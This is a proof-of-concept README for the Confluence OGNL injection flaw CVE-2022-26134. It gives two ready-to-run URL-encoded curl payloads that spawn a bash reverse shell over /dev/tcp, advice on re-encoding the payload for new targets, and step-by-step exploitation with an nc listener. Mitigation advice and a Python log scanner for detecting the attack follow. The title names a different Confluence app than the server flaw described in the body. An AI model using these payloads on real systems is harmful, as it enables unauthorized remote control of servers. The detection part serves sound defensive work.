Active Exploitation of Atlassian’s Questions for Confluence App CVE-2022-26134

# Active Exploitation of Confluence CVE-2022-26134
## Overview
CVE-2022-26134 is a critical **Remote Code Execution (RCE)** vulnerability affecting **Atlassian Confluence**. It allows an unauthenticated attacker to execute arbitrary code by sending an HTTP request whose URI path contains an OGNL expression, which the server then evaluates.
## Affected Versions
- All supported versions of **Atlassian Confluence Server** and **Data Center** before the patched release.
## Exploit Details
The following **curl** command demonstrates active exploitation of this vulnerability. The injected OGNL expression instantiates Java’s **Nashorn** script engine and uses it to spawn a reverse shell:
```bash
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/
```
When modifying the payload (for example, changing the callback address and port), URL encoding must be taken into account.
The payload string in the proof-of-concept isn't completely URL encoded: certain characters (notably `.`, `-` and `/`) are left unencoded.
Although this is not always the case for other exploits, here it turns out to matter. If any of these characters are encoded,
the server parses the URL differently and the payload may not execute. This means the whole payload can't simply be URL-encoded once it has been modified.

The same request with a different target and listener address, keeping `.`, `-` and `/` unencoded:
```bash
curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.118.4/4444%200%3E%261%27%29.start%28%29%22%29%7D/
```
### Breakdown of the Payload
1. **`${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}`**
- The `${...}` wrapper is evaluated by Confluence as an OGNL expression. It instantiates Java’s **Nashorn** script engine and hands it a JavaScript string to evaluate.
2. **`new java.lang.ProcessBuilder().command('bash','-c','bash -i >& /dev/tcp/10.0.0.28/1270 0>&1').start()`**
- The JavaScript evaluated by Nashorn spawns a reverse shell connecting back to **10.0.0.28:1270** (`%3E%26` in the URL decodes to `>&`).
## Exploitation Steps
1. Set up a **listener** on your attacking machine:
```bash
nc -lvnp 1270
```
2. Execute the **curl** exploit command.
3. Upon successful exploitation, you will receive a reverse shell.
## Mitigation
- Atlassian has released **security patches** for affected versions. It is highly recommended to update to the latest version immediately.
- Restrict access to **Confluence servers** from untrusted sources.
- Monitor web server and access logs for requests whose URL-decoded path contains OGNL expressions such as `${...}`, in particular references to `javax.script.ScriptEngineManager` or `java.lang.ProcessBuilder`.
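The log-monitoring recommendation above, as an added example (not part of the original PoC README): a small scanner that URL-decodes the request path of each access-log line, repeats the decoding to catch double-encoded payloads, and flags lines containing the OGNL indicators used by the exploit on this page. The log lines are constructed for illustration and assume a combined-format access log (`client - user [timestamp] "METHOD PATH PROTO" status bytes`) such as Tomcat or a reverse proxy in front of Confluence would write; adjust `REQUEST_RE` for other layouts.

```python
"""Flag CVE-2022-26134-style OGNL injection attempts in Confluence access logs.

Added example, not part of the original PoC. Log lines below are constructed;
the field layout assumed is the common combined access-log format.
"""
import re
from urllib.parse import unquote

# Indicators present in the exploit request once the path is URL-decoded.
OGNL_MARKERS = (
    "${",                               # OGNL expression delimiter in the URI path
    "javax.script.ScriptEngineManager",  # script-engine bootstrap used by the PoC
    "nashorn",
    "java.lang.ProcessBuilder",
    "java.lang.Runtime",                 # common alternative for process execution
)

# Extracts the request line: "GET /path HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>HTTP/[\d.]+)"')


def fully_decode(path: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads (%2524 -> %24 -> $) are caught."""
    decoded = path
    for _ in range(max_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def matched_markers(path: str) -> list:
    """Return the OGNL indicators found in the decoded request path (case-insensitive)."""
    decoded = fully_decode(path).lower()
    return [m for m in OGNL_MARKERS if m.lower() in decoded]


def scan_log(lines) -> list:
    """Return (client_ip, decoded_path, markers) for every suspicious request line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        markers = matched_markers(m.group("path"))
        if markers:
            client = line.split(" ", 1)[0]
            hits.append((client, fully_decode(m.group("path")), markers))
    return hits


# Constructed sample log: a normal login, the exploit URI shown in this README,
# a double-encoded probe, and an ordinary page view.
SAMPLE_LOG = [
    '10.0.0.28 - - [02/Jun/2022:14:01:05 +0000] "GET /login.action HTTP/1.1" 200 5123',
    '10.0.0.28 - - [02/Jun/2022:14:01:09 +0000] "GET /%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/ HTTP/1.1" 302 0',
    '10.0.0.29 - - [02/Jun/2022:14:02:11 +0000] "GET /%2524%257B7*7%257D/ HTTP/1.1" 302 0',
    '10.0.0.30 - - [02/Jun/2022:14:03:00 +0000] "GET /display/DOCS/Home HTTP/1.1" 200 9012',
]

if __name__ == "__main__":
    for client, path, markers in scan_log(SAMPLE_LOG):
        print(f"ALERT client={client} markers={markers} path={path[:80]}")
```

The decode-until-stable loop matters because a single `unquote()` would miss the double-encoded probe (`%2524%257B...`) entirely; matching on the decoded path rather than the raw URI is also what makes the check independent of which characters the attacker chose to leave unencoded. Note that the exploit request returns a redirect (302) rather than an error, so status-code filtering alone will not surface these attempts.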
## References
- [Atlassian Security Advisory](https://confluence.atlassian.com/security)
- [CVE-2022-26134 Details](https://nvd.nist.gov/vuln/detail/CVE-2022-26134)
## Disclaimer
This documentation is for **educational purposes only**. Unauthorized exploitation of systems is illegal and may result in severe consequences. Always obtain proper authorization before conducting security assessments.